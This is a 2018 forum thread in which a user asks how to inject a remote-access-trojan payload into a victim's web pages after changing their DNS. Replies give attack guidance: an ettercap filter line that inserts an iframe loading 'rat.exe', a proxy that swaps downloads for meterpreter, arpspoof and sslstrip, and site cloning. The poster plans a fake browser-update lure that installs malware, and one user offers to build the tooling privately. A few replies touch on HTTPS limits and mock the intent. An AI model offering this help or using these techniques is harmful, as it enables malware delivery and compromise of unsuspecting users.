anao00 Posted October 18, 2018 Share Posted October 18, 2018 Let's say I've managed to change my target's DNS How could I inject a payload (from a RAT) directly into the webpage of my victim? I don't want them to get redirected to a fake website, I just want to inject them with malicious code. Quote Link to comment Share on other sites More sharing options...
anao00 Posted October 18, 2018 Author Share Posted October 18, 2018 Nice, the forum doesn't allow the OP to edit his own thread. What I wanted to do was to have the user type in a website domain and get the contents of that website altered so I could add some code to it, and I wanted to do that only by changing his DNS servers. I don't know how practical that is, I just wanted to know if its possible, and how. Quote Link to comment Share on other sites More sharing options...
bg-wa Posted October 18, 2018 Share Posted October 18, 2018 I made this a few weeks ago. https://github.com/bg-wa/rails_in_the_middle Set up the app and point your DNS to it, point the app to the site you want to modify, and inject whatever code you want before it's sent to the user (also works the other direction, sending data to the original server). *Also not sure how practical this is, but its possible. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted October 18, 2018 Share Posted October 18, 2018 There might already be some man-in-the-middle tools that provide this types of technique. To do this yourself will take research, it's not that hard to accomplish but also not that simple to explain. The quickest suggestion I have is with a ettercap filter. What I have done in the past with a ettercap filter, replace a html lstring like </TITTLE> with your payload </TITTLE><iframe SRC=rat.exe> do research on ettercap. Learn what works and does not work. 1 Quote Link to comment Share on other sites More sharing options...
anao00 Posted October 18, 2018 Author Share Posted October 18, 2018 5 hours ago, bg-wa said: I made this a few weeks ago. https://github.com/bg-wa/rails_in_the_middle Set up the app and point your DNS to it, point the app to the site you want to modify, and inject whatever code you want before it's sent to the user (also works the other direction, sending data to the original server). *Also not sure how practical this is, but its possible. Do I need to be locally present, close to the target? If I set up rails in the middle on a webserver that is also running a DNS server and them make, somehow, the user use that DNS instead of the ISP's, could I temper a request from www.amazon.com and add something to the index.html page? How could I possibly protect myself from that besides regularly checking my DNS to see if its the correct one? I want to test that thing. I spent almost 2 days thinking about this and trying to figure out ways to make it work, and then how to make it not work on my machines. Haha. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted October 19, 2018 Share Posted October 19, 2018 1 hour ago, anao00 said: Do I need to be locally present, close to the target? If I set up rails in the middle on a webserver that is also running a DNS server and them make, somehow, the user use that DNS instead of the ISP's, could I temper a request from www.amazon.com and add something to the index.html page? How could I possibly protect myself from that besides regularly checking my DNS to see if its the correct one? I want to test that thing. I spent almost 2 days thinking about this and trying to figure out ways to make it work, and then how to make it not work on my machines. Haha. For what you want to do. man in the middle vs amazon may be impossible for publicly available tools... you should learn this stuff. fallow a ettercap filter tutorial... follow sslstrip tutorials... It might work if by chance the web surfer visits a out of date web server or if the advertisement on the screen uses http protocol or not encrypted traffic... I have a video of doing exactly what your asking for. I made a mitm ruby proxy that would replace any executable with a meterpreter.exe during the download process. it would depend on the traffic being not encrypted or at least when sslstrip worked. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted October 19, 2018 Share Posted October 19, 2018 17 hours ago, anao00 said: Let's say I've managed to change my target's DNS ..."Theoretically"? 14 hours ago, anao00 said: Nice, the forum doesn't allow the OP to edit his own thread. You can't edit your posts as a new user. You have to have a certain amount of posts before given that privilege. It can be annoying, but if you don't rush your post it's not a problem. 14 hours ago, anao00 said: What I wanted to do was to have the user type in a website domain and get the contents of that website altered so I could add some code to it, and I wanted to do that only by changing his DNS servers. Change his DNS servers to a replica page you created based on the real site. Make the changes you want. That's what everyone else does, unfortunately. No-lifers preying on people who don't know how dangerous the internet can be. You would know how to do this by simply having general knowledge about DNS servers, HTTP ports and web servers. Maybe JS/PHP, depending on the type of payload. Information you could get anywhere. But you know, of course you wouldn't ever be immediately malicious to someone because you obviously sound like you have tonnes of experience and are definitely not asking very to-the-point questions. ? Quote Link to comment Share on other sites More sharing options...
i8igmac Posted October 19, 2018 Share Posted October 19, 2018 Ok. I have a idea. a proxy that clones the target or destination address. Get /amazonDotCom set toolkit-clone amazonDotCom Provide fresh-cloned-new-response to the client. There doesn't work on everything. Its doable. Arpspoof is the best mitm tool I use. iptables to redirect all traffic back and forth on the network. Or from Client <-> proxy-tamper.rb wont be hard to do in bash. Automate what you want to happen. I can make This for you. I prefer ruby but I have worked with people befor that built half of a toolkit project build. direct message me. Quote Link to comment Share on other sites More sharing options...
bg-wa Posted October 19, 2018 Share Posted October 19, 2018 (edited) @anao00 Yes, you are correct DNS is a fragile system (in more ways than this example). Regardless of where you intercept, it can be difficult to detect. One thing not mentioned is SSL... you can use this method to host https://amazon.com at https://my-custom domain.com or http://amazon.com, but you wont have the right cert on your middleware machine to host https://amazon.com. Its subtle, but browsers are doing a better job of pointing out non-secure sites lately. Edited October 19, 2018 by bg-wa syntax Quote Link to comment Share on other sites More sharing options...
anao00 Posted October 19, 2018 Author Share Posted October 19, 2018 19 hours ago, Dave-ee Jones said: ..."Theoretically"? You can't edit your posts as a new user. You have to have a certain amount of posts before given that privilege. It can be annoying, but if you don't rush your post it's not a problem. Change his DNS servers to a replica page you created based on the real site. Make the changes you want. That's what everyone else does, unfortunately. No-lifers preying on people who don't know how dangerous the internet can be. You would know how to do this by simply having general knowledge about DNS servers, HTTP ports and web servers. Maybe JS/PHP, depending on the type of payload. Information you could get anywhere. But you know, of course you wouldn't ever be immediately malicious to someone because you obviously sound like you have tonnes of experience and are definitely not asking very to-the-point questions. ? Change the DNS > User gets redirected to my website even though the URL is the same, but there is no https, only http > There is a warning saying that they browser or whatever is outdated and it asks for the user to download the update and install it > Undetectable payload is then installed. How could someone possibly defend themselves against this unless they know about MITM and the importance of HTTPS and checking the URL? 17 hours ago, i8igmac said: Ok. I have a idea. a proxy that clones the target or destination address. Get /amazonDotCom set toolkit-clone amazonDotCom Provide fresh-cloned-new-response to the client. There doesn't work on everything. Its doable. Arpspoof is the best mitm tool I use. iptables to redirect all traffic back and forth on the network. Or from Client <-> proxy-tamper.rb wont be hard to do in bash. Automate what you want to happen. I can make This for you. I prefer ruby but I have worked with people befor that built half of a toolkit project build. direct message me. I've been trying my luck with python. Lets say I own a DNS server and a lot of other servers. The user goes through the DNS and then gets redirected to my website. The website detects the original url that was intended, clones the desired page and poison the data with what I want, and then delivers it to the user. The problem with set is that it wasn't intended to be used for cloning and adding extra stuff. They made so you could easily grab credentials by capturing POSTs. A little bit of code tweak would be required. But its not very practical since the website would take too long to load, long enough that user could google about his connection being slow and then finding an article telling him to change his DNS. 2 hours ago, bg-wa said: @anao00 Yes, you are correct DNS is a fragile system (in more ways than this example). Regardless of where you intercept, it can be difficult to detect. One thing not mentioned is SSL... you can use this method to host https://amazon.com at https://my-custom domain.com or http://amazon.com, but you wont have the right cert on your middleware machine to host https://amazon.com. Its subtle, but browsers are doing a better job of pointing out non-secure sites lately. More fragile than DNS only basically every router that there is out there. That is very concerning. It was possible not a long time ago to have a domain like amazon.com being fed to the user using https and a valid certificate, but the way you'd achieve that was through buying a domain that looked like amazon.com, but actually the "a" from amazon was the a from the Cyrillic alphabet or something. Some guy even coded a script for that. Now, every updated browser will display a url that would look like "xn----14811mazon.com" after the user clicked the link, so its not very practical. But I noticed that most people don't even know what https is, and those who do know, they wouldn't question or try to figure out what is wrong if they accessed google and the browser didn't display a green padlock. They typed google.com and it worked, that's what they care about. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted October 19, 2018 Share Posted October 19, 2018 its all automation like clock work. If you clone the site, you could easily add or modify this data before it gets sent out. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted October 21, 2018 Share Posted October 21, 2018 ? Quote Link to comment Share on other sites More sharing options...
Bigbiz Posted January 2, 2019 Share Posted January 2, 2019 Buy a domain set up a phoney website inject code. See how long the site lasts. A tool called wifiphisher is setting up phoney web page to man in the middle ya. Looks like a normal router page? Only real way to alter web page code would be break the law. Copyright or domain trespas. If ya tried it on amazon.com im sure that it would trigger an alarm somewhere. Ever watch hackers Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.